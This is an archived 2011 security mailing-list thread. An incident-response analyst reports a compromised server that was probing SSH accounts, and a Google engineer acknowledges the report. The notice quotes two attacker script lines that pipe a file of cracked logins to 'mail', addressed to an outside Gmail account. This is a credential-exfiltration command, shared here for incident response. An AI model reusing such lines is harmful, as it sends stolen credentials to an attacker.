[nsp-sec] gmail account recieves compromised ssh accounts
Peter Moody
pmoody at google.com
Tue Nov 22 11:06:42 EST 2011
ack.
On Tue, Nov 22, 2011 at 7:53 AM, Torsten Voss <voss at dfn-cert.de> wrote:
> ----------- nsp-security Confidential --------
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hello,
>
> we've found a compromised server which was attacking other systems with ssh
> account probes. The script sends the ssh user+passwords to:
>
> facut.la.vrajeala at gmail.com
>
> Script-lines:
> cat vuln.txt | mail -s "L-amPrins" facut.la.vrajeala at gmail.com
> cat vuln.txt | mail -s 'We Got Roots' facut.la.vrajeala at gmail.com
>
>
> Kind regards,
> Torsten, AS680
>
> - --
> Dipl.-Ing.(FH) Torsten Voss (Incident Response Team), Phone +49 40
> 808077-634
>
> DFN-CERT Services GmbH, https://www.dfn-cert.de, Phone +49 40 808077-590
> Sitz / Register: Hamburg, AG Hamburg, HRB 88805, Ust-IdNr.: DE 232129737
> Sachsenstrasse 5, 20097 Hamburg/Germany, CEO: Dr. Klaus-Peter Kossakowski
>
> Automatische Warnmeldungen https://www.cert.dfn.de/autowarn
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v2.0.16 (GNU/Linux)
> Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/
>
> iEYEARECAAYFAk7LxYIACgkQLn8qYyAllOS+1QCcCRAfRQjZm+Dmt3wZqQpFw0sA
> 8eIAnApNm8Ib5aGofxdNgkOaUmfbZSrY
> =1CSX
> -----END PGP SIGNATURE-----
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
>
--
Peter Moody Google 1.650.253.7306
Security Engineer pgp:0xC3410038
More information about the nsp-security
mailing list